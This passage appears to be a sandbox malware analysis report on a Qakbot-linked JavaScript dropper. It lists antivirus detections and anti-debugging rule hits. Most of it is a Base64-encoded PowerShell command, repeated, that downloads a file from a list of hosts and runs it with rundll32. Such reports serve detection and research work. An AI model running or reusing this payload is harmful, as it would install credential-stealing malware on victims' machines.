AHIAYQBzAHMAbwB3AHMAUwB1AGIAZAB1AGUAZABuAGUAcwBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABNAEEAYgBRAEIAdgBBAEcAOABBAFkAdwBCAG8AQQBIAE0AQQBMAGcAQgBuAEEARwBFAEEAYgBRAEIAbABBAEgATQBBAFkAQQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBPAFEAQQB1AEEARABZAEEATwBBAEEAdQBBAEQARQBBAE0AQQBBAHkAQQBDADQAQQBNAFEAQQB5AEEARABRAEEAIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAbABpAHQAZQByAGEAdABlAHMATQBvAG4AZwBvAG8AcwBlAHMALgBzAHUAYgB0AHIAbwBjAGgAYQBuAHQAZQByAGkAYwApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADIANgA2ADMAMwAzACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEASgBBAEIAbABBAEcANABBAGQAZwBBADYAQQBGAEEAQQBjAGcAQgB2AEEARwBjAEEAYwBnAEIAaABBAEcAMABBAFIAQQBCAGgAQQBIAFEAQQBZAFEAQgBjAEEARwB3AEEAYQBRAEIAMABBAEcAVQBBAGMAZwBCAGgAQQBIAFEAQQBaAFEAQgB6AEEARQAwAEEAYgB3AEIAdQBBAEcAYwBBAGIAdwBCAHYAQQBIAE0AQQBaAFEAQgB6AEEAQwA0AEEAYwB3AEIAMQBBAEcASQBBAGQAQQBCAHkAQQBHADgAQQBZAHcAQgBvAEEARwBFAEEAYgBnAEIAMABBAEcAVQBBAGMAZwBCAHAAQQBHAE0AQQBMAEEAQgBVAEEARwBVAEEAYwB3AEIAMABBAEQAcwBBAFIAUQBCADQAQQBIAEEAQQBjAGcAQgBsAEEASABNAEEAYwB3AEIAcQBBAEgATQBBACIAOwAkAGYAbwByAGUAZABlAHMAawAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMABBAEQAawBBAEwAZwBBAHgAQQBEAGsAQQBNAEEAQQB1AEEARABFAEEATgBBAEEANABBAEMANABBAE0AZwBBAHkAQQBEAEUAQQAiADsAYgByAGUAYQBrADsAfQBFAHgAcAByAGUAcwBzAGoAcwA7AH0AIABjAGEAdABjAGgAIAB7ACQASAB5AGEAbAB1AHIAbwBuAGkAYwBPAGYAZgBsAG8AYQBkAGUAZAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAVQBBAGIAZwBCAGsAQQBHAFUAQQBjAGcAQgBtAEEARwB3AEEAYgB3AEIAMwBBAEcAawBBAGIAZwBCAG4AQQBDADQAQQBjAHcAQgBoAEEAQQA9AD0AcQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHcAQQBHAGsAQQBiAGcAQgBuAEEARwB3AEEAWgBRAEIAVABBAEcARQBBAGIAQQBCAHAAQQBHAE0AQQBiAHcAQgB5AEEARwA0AEEAYQBRAEIAaABBAEMANABBAFoAZwBCADEAQQBIAFEAQQBZAGcAQgB2AEEARwB3AEEAcQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHADAAQQBZAFEAQgB5AEEARwBrAEEAZABBAEIAaABBAEcAYwBBAFoAUQBBAHUAQQBHADAAQQBiAHcAQgB0AEEAQQA9AD0AcQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFAE0AQQBiAHcAQgB1AEEARwBZAEEAWgBRAEIAegBBAEgATQBBAFoAUQBCAHkAQQBFAEkAQQBZAFEAQgB1AEEARwBzAEEAYwB3AEIAcABBAEcARQBBAGMAdwBBAHUAQQBHAEkAQQBZAFEAQgA1AEEARwBVAEEAYwBnAEIAdQBBAEEAPQA9ACIAOwAkAHIAZQBjAHUAZQBpAGwAbABlAG0AZQBuAHQAUAByAG8AcwBwAGUAYwB0AGkAbgBnACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATQBRAEEANABBAEMANABBAE0AUQBBAHkAQQBEAEEAQQBMAGcAQQAyAEEARABFAEEATABnAEEAeABBAEQAawBBAE4AQQBBAD0AbgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBNAGcAQQB1AEEARABFAEEATwBRAEEAMQBBAEMANABBAE0AUQBBADIAQQBEAFkAQQBMAGcAQQB4AEEARABnAEEATwBRAEEAPQBuAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAWQBBAGEAUQBCAGkAQQBIAEkAQQBhAFEAQgB1AEEARwBFAEEAZABBAEIAbABBAEYAUQBBAGEAUQBCAHUAQQBHAGMAQQBiAEEAQgBsAEEASABJAEEATABnAEIAagBBAEcAOABBACIAOwB9AH0AJABTAHUAYwBjAG8AdQByAGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQASQBBAE0AUQBBAHUAQQBEAEkAQQBNAEEAQQAzAEEAQwA0AEEATQBnAEEAMABBAEQAWQBBAEwAZwBBAHgAQQBEAE0AQQBNAEEAQQA9AHcAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBRAEEAYQBRAEIAdwBBAEcAZwBBAGUAUQBCAGwAQQBIAE0AQQBhAFEAQgB6AEEARQBNAEEAYgB3AEIAdABBAEcAMABBAFoAUQBCAHUAQQBHAFEAQQBZAFEAQgBrAEEARwA4AEEAYwBnAEEAdQBBAEgAQQBBAFkAUQBCAHkAQQBHAGsAQQBjAHcAQQA9AHcAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATwBBAEEANQBBAEMANABBAE8AQQBBADMAQQBDADQAQQBNAFEAQQB4AEEARABBAEEATABnAEEAeABBAEQAVQBBAE0AUQBBAD0AdwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAGMAQQBaAFEAQgB1AEEARwBVAEEAWQBRAEIAcwBBAEcAOABBAFoAdwBCAHAAQQBHAE0AQQBVAHcAQgBvAEEARwA4AEEAZAB3AEIAaQBBAEcAOABBAFkAUQBCADAAQQBDADQAQQBaAGcAQgBoAEEASABNAEEAYQBBAEIAcABBAEcAOABBAGIAZwBBAD0AIgA7ACQAQgByAGEAaQBuAHcAYQBzAGgAZQByAHMAUAByAGUAYwBvAG4AZABlAG0AbgBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABVAEEATQBnAEEAdQBBAEQASQBBAE0AUQBBAHgAQQBDADQAQQBNAGcAQQB6AEEARABjAEEATABnAEEAeQBBAEQATQBBAE0AdwBBAD0ASQA9AG0AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBKAEEARwAwAEEAYgBRAEIAaABBAEcANABBAGQAQQBCAHMAQQBHAFUAQQBMAGcAQgBzAEEARwBFAEEAYgBnAEIAawBBAEEAPQA9AEkAPQBtAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAawBBAEcAVQBBAFkAdwBCAGgAQQBIAFEAQQBlAFEAQgBzAEEARgBNAEEAZABRAEIAaQBBAEgAWQBBAGIAdwBCAGoAQQBHAEUAQQBiAEEAQQB1AEEARwBNAEEAWQB3AEEAPQAiADsA" |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABBAHUAcgBvAGMAaABzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATgBBAEEAMgBBAEMANABBAE0AUQBBAHkAQQBEAEUAQQBMAGcAQQB4AEEARABZAEEATwBRAEEAdQBBAEQAUQBBAE0AQQBBAD0AcwBmAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgASQBBAFoAUQBCADMAQQBHAEUAQQBiAEEAQgBzAEEARwA4AEEAZAB3AEIAVwBBAEcAawBBAFkAUQBCAHUAQQBHAFEAQQBaAFEAQgB5AEEAQwA0AEEAYwBnAEIAbABBAEgAQQBBAFkAUQBCAHAAQQBIAEkAQQAiADsAJABEAGkAZwByAGUAcwBzAGkAbwBuAGEAcgB5AEEAbgBvAHAAbABhACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBZAEEAYgB3AEIAeQBBAEcAVQBBAFoAdwBCAGgAQQBHAHcAQQBiAEEAQgBsAEEASABJAEEAZQBRAEEAdQBBAEgAUQBBAGIAdwBCAGsAQQBHAEUAQQBlAFEAQQA9AEoARABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBIAFUAQQBiAGcAQgBqAEEASABJAEEAWgBRAEIAaABBAEgAUQBBAFoAUQBBAHUAQQBIAE0AQQBkAFEAQgB5AEEARwBjAEEAWgBRAEIAeQBBAEgAawBBACIAOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA5ADsAJABwAHUAcABpAGwAbABhAGcAZQBHAGkAZwBhAG4AdABpAGMAaQBkAGUAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFkAQQBNAGcAQQB1AEEARABFAEEATwBBAEEAeQBBAEMANABBAE8AUQBBADEAQQBDADQAQQBNAFEAQQB3AEEARABBAEEAUABWAFIAVwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADUAQQBEAFEAQQBMAGcAQQB4AEEARABNAEEATwBRAEEAdQBBAEQARQBBAE4AdwBBADEAQQBDADQAQQBNAGcAQQAxAEEARABJAEEAUABWAFIAVwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAFEAQQB3AEEAQwA0AEEATQBnAEEAMABBAEQAawBBAEwAZwBBAHkAQQBEAE0AQQBOAFEAQQB1AEEARABJAEEATgBRAEEAeQBBAEEAPQA9ACIAOwAkAE0AaQBjAHIAbwBjAGgAZQBtAGkAYwBhAGwAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAEkAQQBaAFEAQgBqAEEARwBnAEEAWQBRAEIAeQBBAEcAYwBBAFoAUQBCAGgAQQBHAEkAQQBiAEEAQgBsAEEAQwA0AEEAWQB3AEIAaABBAEgATQBBAGEAUQBCAHUAQQBHADgAQQB6AFIAUwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAGcAQQA1AEEAQwA0AEEATQBRAEEANQBBAEQASQBBAEwAZwBBAHkAQQBEAEUAQQBNAEEAQQB1AEEARABJAEEATQBBAEEAMgBBAEEAPQA9ACIAOwAkAFQAcgBlAG0AZQBuAGQAbwB1AHMAbgBlAHMAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgARQBBAGQAUQBCAGgAQQBIAEkAQQBkAEEAQgBoAEEARgBRAEEAYQBRAEIAdQBBAEcAWQBBAGQAUQBCAHMAQQBDADQAQQBZAGcAQgAxAEEARwBrAEEAYgBBAEIAawBBAEEAPQA9AHIAQwBKAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAUQBBAE4AZwBBAHUAQQBEAEkAQQBNAEEAQQB6AEEAQwA0AEEATQBRAEEAeQBBAEQAYwBBAEwAZwBBAHgAQQBEAEEAQQBNAGcAQQA9ACIAOwAkAHgAZQBuAG8AYwByAHkAcwB0AGkAYwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMwBBAEQAYwBBAEwAZwBBADUAQQBEAEUAQQBMAGcAQQA0AEEARABVAEEATABnAEEAeABBAEQASQBBAE4AQQBBAHYAQQBIAEEAQQBUAGcAQgBZAEEARgBrAEEATAB3AEIAeQBBAEQARQBBAFYAQQBCAG0AQQBHAGMAQQBiAFIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABjAEEATgBnAEEAdQBBAEQARQBBAE0AZwBBADAAQQBDADQAQQBNAFEAQQA1AEEARABnAEEATABnAEEAeQBBAEQARQBBAE4AQQBBAHYAQQBIAEkAQQBRAFEAQgBCAEEARQA4AEEAZABRAEIAMgBBAEQAWQBBAEwAdwBBAHcAQQBHADgAQQBhAGcAQgA1AEEARwBZAEEAVgBnAEIAVABBAEEAPQA9AGIAUgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAGMAQQBMAGcAQQA1AEEARABFAEEATABnAEEANABBAEQAYwBBAEwAZwBBAHkAQQBEAEkAQQBOAGcAQQB2AEEARABJAEEAYQB3AEIAVgBBAEYAawBBAE0AUQBCAEcAQQBDADgAQQBaAFEAQgBJAEEASABjAEEAYQBRAEIAawBBAEcANABBAFEAdwBBAD0AIgA7AGYAbwByAGUAYQBjAGgAIAAoACQAcgBhAHMAaABlAHMAVAByAGEAbgBzAGwAdQBjAGUAbgBjAGkAZQBzACAAaQBuACAAJAB4AGUAbgBvAGMAcgB5AHMAdABpAGMAIAAtAHMAcABsAGkAdAAgACIAYgBSACIAKQAgAHsAJABmAGEAcgByAGkAcwBpAHQAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAdwBBAGIAdwBCADIAQQBHAEUAQQBaAHcAQgBsAEEASABNAEEATABnAEIAbwBBAEcARQBBAGIAUQBCAGkAQQBIAFUAQQBjAGcAQgBuAEEAQQA9AD0AIgA7AHQAcgB5ACAAewAkAFMAbwBwAGgAaQBzAHQAaQBjAGEAbABsAHkAVQBuAGcAdQBhAHIAYQBuAHQAZQBlAGQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAGsAQQBiAFEAQgB3AEEASABJAEEAWgBRAEIAegBBAEcARQBBAEwAZwBCADEAQQBIAE0AQQB4AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAQQBBAE0AUQBBAHUAQQBEAFUAQQBNAHcAQQB1AEEARABZAEEATgBRAEEAdQBBAEQARQBBAE0AUQBBADIAQQBBAD0APQAiADsAJABnAHIAYQB2AGUAZwBhAHIAdABoACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBzAEEARwBVAEEAZABnAEIAbABBAEcAdwBBAGIAUQBCAGgAQQBHADQAQQBVAHcAQgB3AEEARwBFAEEAWgBBAEIAcABBAEgAZwBBAFoAUQBCAHoAQQBDADQAQQBZAHcAQgBsAEEARwA4AEEAeQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAFEAQQB6AEEAQwA0AEEATQBRAEEAMwBBAEQAUQBBAEwAZwBBAHkAQQBEAFEAQQBPAEEAQQB1AEEARABJAEEATgBBAEEAegBBAEEAPQA9AHkAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBFAEEAWgBBAEIAaABBAEgAQQBBAGQAQQBCAHAAQQBIAFkAQQBaAFEAQgBzAEEASABrAEEAVgBnAEIAcABBAEcAOABBAGIAQQBCAGwAQQBHADQAQQBZAHcAQgBsAEEAQwA0AEEAYwB3AEIAdgBBAEcAWQBBAGQAQQBCADMAQQBHAEUAQQBjAGcAQgBsAEEAQQA9AD0AeQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCADEAQQBHADQAQQBjAGcAQgAxAEEARwBZAEEAWgBnAEIAcwBBAEcAVQBBAFoAQQBCAEUAQQBHAG8AQQBaAFEAQgBpAEEARwBVAEEAYgBBAEIAegBBAEMANABBAGQAQQBCAHYAQQBIAGsAQQBjAHcAQQA9ACIAOwAkAHIAZQBtAGUAbQBiAHIAYQBuAGMAZQBBAGwAZQB4AGEAbgBkAGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUARQBBAGQAZwBCAHAAQQBHAGMAQQBZAFEAQgAwAEEARwBVAEEATABnAEIAbABBAEgATQBBAGQAQQBCAGgAQQBIAFEAQQBaAFEAQQA9ACIAOwAkAG0AYQBuAGcAYQBuAG8AcABoAHkAbABsAGkAdABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHIAYQBzAGgAZQBzAFQAcgBhAG4AcwBsAHUAYwBlAG4AYwBpAGUAcwApACkAOwBpAHcAcgAgACQAbQBhAG4AZwBhAG4AbwBwAGgAeQBsAGwAaQB0AGUAIAAtAE8AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAbABpAHQAZQByAGEAdABlAHMATQBvAG4AZwBvAG8AcwBlAHMALgBzAHUAYgB0AHIAbwBjAGgAYQBuAHQAZQByAGkAYwA7ACQAYwBhAHIAYQBzAHMAbwB3AHMAUwB1AGIAZAB1AGUAZABuAGUAcwBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABNAEEAYgBRAEIAdgBBAEcAOABBAFkAdwBCAG8AQQBIAE0AQQBMAGcAQgBuAEEARwBFAEEAYgBRAEIAbABBAEgATQBBAFkAQQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBPAFEAQQB1AEEARABZAEEATwBBAEEAdQBBAEQARQBBAE0AQQBBAHkAQQBDADQAQQBNAFEAQQB5AEEARABRAEEAIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAbABpAHQAZQByAGEAdABlAHMATQBvAG4AZwBvAG8AcwBlAHMALgBzAHUAYgB0AHIAbwBjAGgAYQBuAHQAZQByAGkAYwApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADIANgA2ADMAMwAzACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEASgBBAEIAbABBAEcANABBAGQAZwBBADYAQQBGAEEAQQBjAGcAQgB2AEEARwBjAEEAYwBnAEIAaABBAEcAMABBAFIAQQBCAGgAQQBIAFEAQQBZAFEAQgBjAEEARwB3AEEAYQBRAEIAMABBAEcAVQBBAGMAZwBCAGgAQQBIAFEAQQBaAFEAQgB6AEEARQAwAEEAYgB3AEIAdQBBAEcAYwBBAGIAdwBCAHYAQQBIAE0AQQBaAFEAQgB6AEEAQwA0AEEAYwB3AEIAMQBBAEcASQBBAGQAQQBCAHkAQQBHADgAQQBZAHcAQgBvAEEARwBFAEEAYgBnAEIAMABBAEcAVQBBAGMAZwBCAHAAQQBHAE0AQQBMAEEAQgBVAEEARwBVAEEAYwB3AEIAMABBAEQAcwBBAFIAUQBCADQAQQBIAEEAQQBjAGcAQgBsAEEASABNAEEAYwB3AEIAcQBBAEgATQBBACIAOwAkAGYAbwByAGUAZABlAHMAawAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMABBAEQAawBBAEwAZwBBAHgAQQBEAGsAQQBNAEEAQQB1AEEARABFAEEATgBBAEEANABBAEMANABBAE0AZwBBAHkAQQBEAEUAQQAiADsAYgByAGUAYQBrADsAfQBFAHgAcAByAGUAcwBzAGoAcwA7AH0AIABjAGEAdABjAGgAIAB7ACQASAB5AGEAbAB1AHIAbwBuAGkAYwBPAGYAZgBsAG8AYQBkAGUAZAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAVQBBAGIAZwBCAGsAQQBHAFUAQQBjAGcAQgBtAEEARwB3AEEAYgB3AEIAMwBBAEcAawBBAGIAZwBCAG4AQQBDADQAQQBjAHcAQgBoAEEAQQA9AD0AcQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHcAQQBHAGsAQQBiAGcAQgBuAEEARwB3AEEAWgBRAEIAVABBAEcARQBBAGIAQQBCAHAAQQBHAE0AQQBiAHcAQgB5AEEARwA0AEEAYQBRAEIAaABBAEMANABBAFoAZwBCADEAQQBIAFEAQQBZAGcAQgB2AEEARwB3AEEAcQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHADAAQQBZAFEAQgB5AEEARwBrAEEAZABBAEIAaABBAEcAYwBBAFoAUQBBAHUAQQBHADAAQQBiAHcAQgB0AEEAQQA9AD0AcQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFAE0AQQBiAHcAQgB1AEEARwBZAEEAWgBRAEIAegBBAEgATQBBAFoAUQBCAHkAQQBFAEkAQQBZAFEAQgB1AEEARwBzAEEAYwB3AEIAcABBAEcARQBBAGMAdwBBAHUAQQBHAEkAQQBZAFEAQgA1AEEARwBVAEEAYwBnAEIAdQBBAEEAPQA9ACIAOwAkAHIAZQBjAHUAZQBpAGwAbABlAG0AZQBuAHQAUAByAG8AcwBwAGUAYwB0AGkAbgBnACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATQBRAEEANABBAEMANABBAE0AUQBBAHkAQQBEAEEAQQBMAGcAQQAyAEEARABFAEEATABnAEEAeABBAEQAawBBAE4AQQBBAD0AbgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBNAGcAQQB1AEEARABFAEEATwBRAEEAMQBBAEMANABBAE0AUQBBADIAQQBEAFkAQQBMAGcAQQB4AEEARABnAEEATwBRAEEAPQBuAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAWQBBAGEAUQBCAGkAQQBIAEkAQQBhAFEAQgB1AEEARwBFAEEAZABBAEIAbABBAEYAUQBBAGEAUQBCAHUAQQBHAGMAQQBiAEEAQgBsAEEASABJAEEATABnAEIAagBBAEcAOABBACIAOwB9AH0AJABTAHUAYwBjAG8AdQByAGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQASQBBAE0AUQBBAHUAQQBEAEkAQQBNAEEAQQAzAEEAQwA0AEEATQBnAEEAMABBAEQAWQBBAEwAZwBBAHgAQQBEAE0AQQBNAEEAQQA9AHcAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBRAEEAYQBRAEIAdwBBAEcAZwBBAGUAUQBCAGwAQQBIAE0AQQBhAFEAQgB6AEEARQBNAEEAYgB3AEIAdABBAEcAMABBAFoAUQBCAHUAQQBHAFEAQQBZAFEAQgBrAEEARwA4AEEAYwBnAEEAdQBBAEgAQQBBAFkAUQBCAHkAQQBHAGsAQQBjAHcAQQA9AHcAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATwBBAEEANQBBAEMANABBAE8AQQBBADMAQQBDADQAQQBNAFEAQQB4AEEARABBAEEATABnAEEAeABBAEQAVQBBAE0AUQBBAD0AdwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAGMAQQBaAFEAQgB1AEEARwBVAEEAWQBRAEIAcwBBAEcAOABBAFoAdwBCAHAAQQBHAE0AQQBVAHcAQgBvAEEARwA4AEEAZAB3AEIAaQBBAEcAOABBAFkAUQBCADAAQQBDADQAQQBaAGcAQgBoAEEASABNAEEAYQBBAEIAcABBAEcAOABBAGIAZwBBAD0AIgA7ACQAQgByAGEAaQBuAHcAYQBzAGgAZQByAHMAUAByAGUAYwBvAG4AZABlAG0AbgBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABVAEEATQBnAEEAdQBBAEQASQBBAE0AUQBBAHgAQQBDADQAQQBNAGcAQQB6AEEARABjAEEATABnAEEAeQBBAEQATQBBAE0AdwBBAD0ASQA9AG0AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBKAEEARwAwAEEAYgBRAEIAaABBAEcANABBAGQAQQBCAHMAQQBHAFUAQQBMAGcAQgBzAEEARwBFAEEAYgBnAEIAawBBAEEAPQA9AEkAPQBtAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAawBBAEcAVQBBAFkAdwBCAGgAQQBIAFEAQQBlAFEAQgBzAEEARgBNAEEAZABRAEIAaQBBAEgAWQBBAGIAdwBCAGoAQQBHAEUAQQBiAEEAQQB1AEEARwBNAEEAWQB3AEEAPQAiADsA" |
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep |
FireEye | JS:Trojan.Cryxos.12541 |
VIPRE | JS:Trojan.Cryxos.12541 |
Cyren | JS/Qbot.I!Eldorado |
Symantec | Scr.Malcode!gen53 |
Cynet | Malicious (score: 99) |
BitDefender | JS:Trojan.Cryxos.12541 |
MicroWorld-eScan | JS:Trojan.Cryxos.12541 |
F-Secure | Malware.JS/Qakbot.G |
Emsisoft | JS:Trojan.Cryxos.12541 (B) |
Avira | JS/Qakbot.G |
MAX | malware (ai score=86) |
Arcabit | JS:Trojan.Cryxos.D30FD |
GData | JS:Trojan.Cryxos.12541 |
Detected | |
ALYac | JS:Trojan.Cryxos.12541 |
Ikarus | Trojan.Script |
parent_process | wscript.exe | martian_process | powershell -encodedcommand "JABBAHUAcgBvAGMAaABzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATgBBAEEAMgBBAEMANABBAE0AUQBBAHkAQQBEAEUAQQBMAGcAQQB4AEEARABZAEEATwBRAEEAdQBBAEQAUQBBAE0AQQBBAD0AcwBmAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgASQBBAFoAUQBCADMAQQBHAEUAQQBiAEEAQgBzAEEARwA4AEEAZAB3AEIAVwBBAEcAawBBAFkAUQBCAHUAQQBHAFEAQQBaAFEAQgB5AEEAQwA0AEEAYwBnAEIAbABBAEgAQQBBAFkAUQBCAHAAQQBIAEkAQQAiADsAJABEAGkAZwByAGUAcwBzAGkAbwBuAGEAcgB5AEEAbgBvAHAAbABhACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBZAEEAYgB3AEIAeQBBAEcAVQBBAFoAdwBCAGgAQQBHAHcAQQBiAEEAQgBsAEEASABJAEEAZQBRAEE